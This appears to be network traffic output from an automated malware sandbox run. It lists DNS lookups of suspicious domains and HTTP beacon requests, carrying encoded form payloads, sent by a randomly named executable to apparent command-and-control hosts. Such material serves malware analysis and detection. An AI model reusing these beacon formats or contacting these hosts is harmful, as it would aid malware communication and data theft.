Jan 11, 2025 09:15:54.815876961 CET | 49984 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:54.820764065 CET | 80 | 49984 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:54.824547052 CET | 49984 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:54.844646931 CET | 49984 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:54.849503994 CET | 80 | 49984 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:54.849577904 CET | 80 | 49984 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:55.731194973 CET | 80 | 49984 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:55.731333971 CET | 80 | 49984 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:55.731401920 CET | 49984 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:56.352891922 CET | 49984 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:57.371812105 CET | 49985 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:57.376638889 CET | 80 | 49985 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:57.376867056 CET | 49985 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:57.388386011 CET | 49985 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:57.393215895 CET | 80 | 49985 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:58.282186031 CET | 80 | 49985 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:58.282329082 CET | 80 | 49985 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:58.282537937 CET | 49985 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:58.285103083 CET | 49985 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:58.289963007 CET | 80 | 49985 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:16:03.947814941 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:03.952763081 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:03.953047037 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:03.968719006 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:03.973506927 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145494938 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145524979 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145536900 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145550966 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145562887 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145566940 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.145576000 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145593882 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.145612955 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.145689964 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145730972 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145745039 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145756960 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.145780087 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.145807028 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.150415897 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.150482893 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.150501966 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.153920889 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.430495024 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.430512905 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.430525064 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.430556059 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.430567980 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.430649042 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.430979013 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.430989981 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.431078911 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.431143999 CET | 80 | 49986 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:05.431421995 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:05.477993965 CET | 49986 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:06.498919964 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:06.503879070 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:06.503974915 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:06.525942087 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:06.530821085 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695336103 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695373058 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695389986 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695406914 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695425034 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695434093 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.695444107 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695477009 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.695487976 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.695488930 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695507050 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695523024 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695542097 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.695645094 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.700385094 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.700403929 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.700423002 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.700489998 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.979760885 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.979809046 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.979862928 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.979897976 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.979909897 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.979934931 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.980032921 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:07.980109930 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.980214119 CET | 80 | 49987 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:07.980324030 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:08.040498018 CET | 49987 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:09.544012070 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:09.548939943 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:09.549077988 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:09.566020966 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:09.570976973 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:09.571099997 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742574930 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742685080 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742700100 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742717981 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742732048 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:10.742749929 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742775917 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:10.742949963 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.742994070 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.743005037 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:10.743010998 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.743058920 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:10.743120909 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.743165970 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.743271112 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:10.747873068 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.747924089 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.747941971 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.747987032 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:10.748084068 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:10.748125076 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:11.029175043 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029202938 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029220104 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029236078 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029253006 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029309988 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:11.029309988 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:11.029326916 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029344082 CET | 80 | 49988 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:11.029778004 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:11.029778004 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:11.071875095 CET | 49988 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:12.090240002 CET | 49989 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:12.095520020 CET | 80 | 49989 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:12.095616102 CET | 49989 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:12.105185032 CET | 49989 | 80 | 192.168.2.7 | 103.159.36.66
Jan 11, 2025 09:16:12.110054970 CET | 80 | 49989 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:13.295727968 CET | 80 | 49989 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:13.295788050 CET | 80 | 49989 | 103.159.36.66 | 192.168.2.7
Jan 11, 2025 09:16:13.295999050 CET | 49989 | 80 | 192.168.2.7 | 103.159.36.66
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 09:14:48.395653009 CET | 52567 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:14:49.480901957 CET | 52567 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:14:50.493364096 CET | 52567 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:14:51.460630894 CET | 53 | 52567 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:14:51.460654020 CET | 53 | 52567 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:14:51.460719109 CET | 53 | 52567 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:15:07.450752974 CET | 58303 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:15:07.463515043 CET | 53 | 58303 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:15:21.536295891 CET | 64462 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:15:21.552731037 CET | 53 | 64462 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:15:35.372256041 CET | 56611 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:15:36.172580957 CET | 53 | 56611 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:15:49.466932058 CET | 49337 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:15:49.682303905 CET | 53 | 49337 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 09:16:03.294461012 CET | 52909 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 09:16:03.943408012 CET | 53 | 52909 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 09:14:48.395653009 CET | 192.168.2.7 | 1.1.1.1 | 0xd21a | Standard query (0) | www.3nhc3a.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:14:49.480901957 CET | 192.168.2.7 | 1.1.1.1 | 0xd21a | Standard query (0) | www.3nhc3a.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:14:50.493364096 CET | 192.168.2.7 | 1.1.1.1 | 0xd21a | Standard query (0) | www.3nhc3a.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:07.450752974 CET | 192.168.2.7 | 1.1.1.1 | 0xf870 | Standard query (0) | www.binjai77rtp11f.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:21.536295891 CET | 192.168.2.7 | 1.1.1.1 | 0x4310 | Standard query (0) | www.vietnamtour.pro | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:35.372256041 CET | 192.168.2.7 | 1.1.1.1 | 0xc27f | Standard query (0) | www.showyourstyle.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:49.466932058 CET | 192.168.2.7 | 1.1.1.1 | 0x781d | Standard query (0) | www.rwse6wjx.sbs | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:16:03.294461012 CET | 192.168.2.7 | 1.1.1.1 | 0x338e | Standard query (0) | www.rokeyfashion.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 09:14:51.460630894 CET | 1.1.1.1 | 192.168.2.7 | 0xd21a | No error (0) | www.3nhc3a.top |  | 20.2.208.137 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:14:51.460654020 CET | 1.1.1.1 | 192.168.2.7 | 0xd21a | No error (0) | www.3nhc3a.top |  | 20.2.208.137 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:14:51.460719109 CET | 1.1.1.1 | 192.168.2.7 | 0xd21a | No error (0) | www.3nhc3a.top |  | 20.2.208.137 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:07.463515043 CET | 1.1.1.1 | 192.168.2.7 | 0xf870 | No error (0) | www.binjai77rtp11f.xyz |  | 104.21.28.65 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:07.463515043 CET | 1.1.1.1 | 192.168.2.7 | 0xf870 | No error (0) | www.binjai77rtp11f.xyz |  | 172.67.144.150 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:21.552731037 CET | 1.1.1.1 | 192.168.2.7 | 0x4310 | No error (0) | www.vietnamtour.pro |  | 104.21.54.126 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:21.552731037 CET | 1.1.1.1 | 192.168.2.7 | 0x4310 | No error (0) | www.vietnamtour.pro |  | 172.67.138.138 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:36.172580957 CET | 1.1.1.1 | 192.168.2.7 | 0xc27f | No error (0) | www.showyourstyle.top |  | 69.57.163.64 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | www.rwse6wjx.sbs | b1-3-r11-gmhudx.t9d2quy5.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r11-gmhudx.t9d2quy5.shop | b1-3-r11.t9d2quy5.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r11.t9d2quy5.shop | b1-3-r111-s65psj.8uqm5xgy.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r111-s65psj.8uqm5xgy.shop | b1-3-r11-nff52.alicloudddos.top |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r11-nff52.alicloudddos.top | b1-3-r111-s65psj.alicloudddos.top |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r111-s65psj.alicloudddos.top | b1-3-r111-55g56.kunlundns.top |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r111-55g56.kunlundns.top | b1-3-r111.kunlundns.top |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:49.682303905 CET | 1.1.1.1 | 192.168.2.7 | 0x781d | No error (0) | b1-3-r111.kunlundns.top |  | 101.32.205.61 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:16:03.943408012 CET | 1.1.1.1 | 192.168.2.7 | 0x338e | No error (0) | www.rokeyfashion.store | rokeyfashion.store |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:16:03.943408012 CET | 1.1.1.1 | 192.168.2.7 | 0x338e | No error (0) | rokeyfashion.store |  | 103.159.36.66 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49968 | 20.2.208.137 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:14:51.486809969 CET | 485 | OUT | GET /s1oh/?UfjxuDP=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTV07xmH02YSuxOuXTBNCt6lVM/O+JsRG51Y9B+1PgAZMJBQ/X3Nrmukkh&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.3nhc3a.top
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Jan 11, 2025 09:14:52.369959116 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 08:14:52 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49970 | 104.21.28.65 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:15:07.672692060 CET | 759 | OUT | POST /9fei/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                Origin: http://www.binjai77rtp11f.xyz
                                                                Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 4d 4b 5a 34 72 59 2f 47 77 62 57 51 65 58 51 52 7a 30 7a 31 38 7a 78 75 4b 4d 6c 70 75 6f 66 59 69 51 76 66 39 69 38 6d 6b 43 4b 73 6f 4a 33 41 41 3d 3d
                                                                Data Ascii: UfjxuDP=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGMKZ4rY/GwbWQeXQRz0z18zxuKMlpuofYiQvf9i8mkCKsoJ3AA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49971 | 104.21.28.65 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:15:10.242604971 CET | 779 | OUT | POST /9fei/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                Origin: http://www.binjai77rtp11f.xyz
                                                                Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 67 32 45 52 6b 74 5a 49 46 31 6a 58 31 71 6b 2b 76 42 51 57 4f 4f 54 6f 4d 2b 49 43 52 43 77 74 49 4b 62 4d 48 68 4f 6e 33 53 5a 4f 7a 6b 37 53 6e 65 65 55 69 4e 61 67 71 6c 63 44 67 70 37 73 50 30 53 38 49 4f 51 4f 58 58 78 36 45 79 48 4d 54 4c 69 70 57 75 44 33 50 34 35 65 42 57 54 48 50 77 71 52 41 4f 54 6e 35 2b 51 2f 47 63 4b 6b 56 2b 6f 54 58 59 35 34 46 61 55 7a 74 58 49 68 65 47 6f 34 52 2b 6a 6d 36 76 7a 63 39 34 75 6a 49 34 65 38 4f 65 50 69 6e 37 63 79 66 6a 44 55 56 6f 57 79 4c 52 34 66 72 74 4c 4b 71 49 6f 54 2b 49 31 71 61 6a 55 33 53 66 57 64 35 54 6e 67 68 36 6f 7a 57 32 76 39 74 66 6a 49 79 6a 72 30 68 35 52 4e 39 57 6d 43 37 59 77 3d
                                                                Data Ascii: UfjxuDP=wjYsQ7yhn9rJg2ERktZIF1jX1qk+vBQWOOToM+ICRCwtIKbMHhOn3SZOzk7SneeUiNagqlcDgp7sP0S8IOQOXXx6EyHMTLipWuD3P45eBWTHPwqRAOTn5+Q/GcKkV+oTXY54FaUztXIheGo4R+jm6vzc94ujI4e8OePin7cyfjDUVoWyLR4frtLKqIoT+I1qajU3SfWd5Tngh6ozW2v9tfjIyjr0h5RN9WmC7Yw=
Jan 11, 2025 09:15:11.466694117 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 08:15:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzb2zWR0ApYn5koUslE1SI3ryf4I%2B0CNJMvzsIo%2F%2Bwnv0Vh2nctI9mdF21itjAkg7%2FeeqTesWHB9cQDED5GqA4231B4MWTLYj3BhxipK5ixYki%2BT6NRLvsbcj%2BrTuuy6a4xlrhMdT3Hk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003751b783d4349-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1672&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
